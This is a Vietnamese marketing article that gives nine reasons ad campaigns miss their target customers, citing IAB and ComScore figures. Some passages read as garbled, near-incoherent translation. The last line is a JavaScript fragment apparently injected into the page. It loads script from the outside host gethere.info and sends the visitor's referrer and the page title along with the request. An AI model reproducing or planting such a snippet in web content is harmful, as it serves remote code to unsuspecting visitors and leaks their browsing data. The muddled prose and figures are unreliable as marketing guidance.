Greg Stuart, Giám đốc điều hành Interactive Advertising Bereau ước tính rằng thất bại lớn nhất của các doanh nghiệp trong chiến dịch quảng cáo là những ấn tượng sai với đối tượng khách hàng hoặc thậm chí chẳng để lại ấn tượng gì. Điều này đã làm thất thoát đi khoảng $112.000.000.000/năm cho các doanh nghiệp tại Mỹ và $220.000.000.000 trên toàn thế giới hoặc thậm chí nó chiếm đến một nửa tổng chi tiêu của họ.
Mặc dù, các chiến dịch quảng cáo của doanh nghiệp ngày càng được hoàn thiện bằng những công cụ mới và sự quan tâm nhiều hơn của người dùng, tuy nhiên, một nghiên cứu gần đây từ ComScore cho thấy chỉ có chỉ có một lượng rất nhỏ những tiếp cận khách hàng của đơn vị doanh nghiệp đạt được những kết quả như mong muốn. Trong số 8 thương hiệu của Mỹ với ngân sách quảng cáo từ $400,000 đến $ 2 triệu, ComScore cho biết, tỉ lệ tiếp cận khách hàng thành công chỉ được ước tính trong 4 thương hiệu hoặc thậm chí ít hơn chỉ khoảng dưới 20%. 80% còn lại đã bị thất bại trong quá trình triển khai hoặc một số may mắn hơn thì đã tiếp cận được đến khách hàng nhưng lại lựa chọn sai khách hàng mục tiêu, dẫn đến cũng chẳng mang lại hiệu quả đáng kể. Đấy là chưa kể đến những người tiêu dùng ngoài nước Mỹ.
Dưới đây là những lý do khiến chiến dịch quảng cáo của doanh nghiệp tiếp cận sai đối tượng khách hàng:
#1 Tiếp cận khách hàng chỉ dựa vào nền tảng chi phí đắt đỏ và không có điều gì đặc biệt
Có thể nhiều người nghĩ rằng, quảng cáo là những chi phí cần một khoản đầu tư lớn từ doanh nghiệp. Điều này không sai, tuy nhiên, tôi muốn nói đến hiệu quả. Phương tiện truyền thông từ cái nhìn của các nhà quy hoạch và phương tiện truyền thông hướng đến người tiêu dùng người mua chỉ được tích hợp khi phương tiện truyền thông dựa vào những gì họ tiêu thụ.
Phải mất một số tiền hợp lý cho việc giải thích và lập kế hoạch để biến các đối tượng mục tiêu được xác định thành một phần của chiến dịch truyền thông mạnh mẽ. Các công nghệ mới cho phép đa dạng hóa các quyết định và phương hướng thực hiện. Nó giúp doanh nghiệp giảm thiểu rủi ro đáng kể nếu như tìm được hướng đi phù hợp mà không nhất thiết phải xây dựng trên một nền tảng chi phí đắt đỏ.
Chiến dịch quảng cáo cần được khảo sát trực tiếp thay vì chỉ dựa vào những cảm nhận tổng quan về người dùng trên một số website.
#2 Thiếu các tiêu chuẩn trong việc định hướng khách hàng mục tiêu
Một thách thức thực sự cho kế hoạch truyền thông khi nói đến việc lựa chọn các mạng quảng cáo hoặc trao đổi dữ liệu là sự định hình rõ ràng khách hàng mục tiêu. Trên bề nổi, hầu như các doanh nghiệp đều có những chiến lược giống nhau nhưng cái cách mà họ tiếp cận hay truy cập dữ liệu lại khác nhau và cả về quy mô.
Một số phân đoạn khách hàng có thể giúp bạn dễ dàng xử lý được các vấn đề tồn kho qua một vài bước quảng cáo đơn giản; quan trọng là bạn xác định họ là ai.
#3 Nhiều cơ quan truyền thông vẫn còn bỡ ngỡ khi thực hiện truyền thông kỹ thuật số
Họ không có lỗi khi không đổi mới công nghệ trong nhiều năm qua. Thiếu các công cụ tự động làm cho kế hoạch truyền thông trở nên khó khăn hơn. Nhiều doanh nghiệp cũng không nắm rõ vấn đề này khi quyết định lựa chọn nhà cung cấp quảng cáo, kênh quảng cáo để rồi không nhận được những kết quả như mong muốn.
Bạn nên tối ưu hóa, chi tiết hơn và chính xác hơn các phân khúc khách hàng. Thông thường các phương tiện truyền thông sẽ hướng đến tốc độ nhiều hơn. Họ thực hiện một cách nhanh chóng và ồ ạt để tiếp cận nhanh mục tiêu mà quên mất xác định đúng khách hàng mình thực sự phải hướng đến.
#4 Chiến dịch quảng cáo giống như một “sản phẩm độc quyền” mà không quan tâm đến các bên liên quan
Chiến dịch quảng cáo của nhiều doanh nghiệp giống như một căn nhà đóng kín, chẳng ai có tiếp cận được. Tôi tự hỏi họ xây dựng chiến lược truyền thông để làm gì? Để tiếp cận ai. Bạn cần nhắc rõ tiêu chuẩn sản phẩm hoặc một điểm gì đó gián tiếp hướng đến đối tượng khách hàng.
Một chiến dịch quảng cáo có nội dung tốt nhưng không có định hướng cụ thể thì cũng sẽ chẳng đạt được thành công. Sự theo dõi của bên thứ 3 là cực kỳ quan trọng.
#5 Chiến dịch quảng cáo bị “cố định”
Bạn nên hiểu một điều về vòng đời của một doanh nghiệp được mong đợi là mãi mãi. Trong suốt khoảng thời gian đó, đương nhiên, bạn không thể chỉ sử dụng duy nhất một chiến dịch quảng cáo. Chiến dịch này cần được mở ra cho một chiến dịch kế tiếp. Nhiều doanh nghiệp khôn ngoan sâu chuỗi nó thành một doanh nghiệp sẽ thu hút được sự chú ý của nhiều khách hàng hơn.
Chiến dịch nhắm đến mục tiêu một cách rõ ràng, cụ thể hơn là dành cho người dùng tại Mỹ đạt hiệu quả hơn 5 – 20% những tưởng tượng của họ bên ngoài.
#6 Nhiều nhà cung cấp dữ liệu chỉ cung cấp một cái nhìn hạn chế của người sử dụng
Trong một chiến dịch gần đây nhắm mục tiêu là người dùng doanh nghiệp tại nhà với trẻ em, chúng ta phải kết hợp người dùng kinh doanh đơn lẻ, người dùng kinh doanh gia đình với trẻ em nhưng sẽ được triển khai từ 3 nhà cung cấp riêng biệt. Nghĩa là đối với từng đối tượng khác nhau, chiến dịch quảng cáo cần định hình những hướng tiếp cận khác nhau nhưng vẫn luôn phải đảm bảo sự thống nhất.
Lượng khách hàng rộng có thể gây khó khăn cho việc tổng hợp hồ sơ dữ liệu, định hướng chiến dịch quảng cáo; vì vậy, nếu không thực sự cần thiết thì bạn nên xác định duy nhất đối tượng khách hàng mục tiêu.
#7 Nhiều người dùng dễ gây hiểu nhầm về nội dung quảng cáo
Những chiến dịch quảng cáo tốt thường đề cao tính sáng tạo và hướng gần nhất đến đối tượng khách hàng mục tiêu; tuy nhiên, nhiều doanh nghiệp lâm vào tình trạng “dở khóc dở cười” khi chiến dịch của họ bị chính đối tượng khách hàng chính hiểu lầm, nghĩ sai và từ đó chối bỏ quyền tiếp nhận.
Điều này thật khó tránh khỏi bởi cảm quan của mỗi khách hàng thực sự không thể nào kiểm soát được. Thứ bạn có thể làm duy nhất là suy xét kỹ càng trước khi công khai chiến dịch quảng cáo của mình.
#8 Đối tượng mục tiêu không có nghĩa là đúng đối tượng
Hầu hết các nhà sản xuất và nhà quảng cáo đều mang lại rất ít khả năng hiển thị trên dữ liệu và các kỹ thuật tối ưu hóa. Điều này gây ra những khó khăn cho doanh nghiệp, những người muốn được mua phương tiện quảng cáo hiểu lên ý tưởng và xây dựng thương hiệu mới để có được những phản ứng tích cực từ phía khách hàng.
Doanh nghiệp xác định đối tượng khách hàng mục tiêu rõ ràng nhưng chưa chắc đã đúng. Đấy là do định hướng khách hàng trên chiến dịch quảng cáo chứ không phải là định hướng khách hàng từ sản phẩm. Điều này hay bị hiểu lầm.
#9 Phương tiện truyền thông không tối ưu trong thời gian thực
Các phương tiện truyền thông nên được tối ưu một đến hai lần trong vòng một tuần. Nhà quảng cáo thường không có nhiều sự kiểm soát để tối ưu hóa khách hàng đến theo chiến dịch của họ. Khi phương tiện truyền thông trở nên minh bạch và hiệu quả hơn trong thời gian thực, nó sẽ có thể thay đổi trình mua bán và nhắm mục tiêu chiến lược đến nhiều đối tượng khách hàng hơn. Việc tối ưu này sẽ giúp doanh nghiệp định hình rõ ràng hơn và đúng hơn đối tượng khách hàng.
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;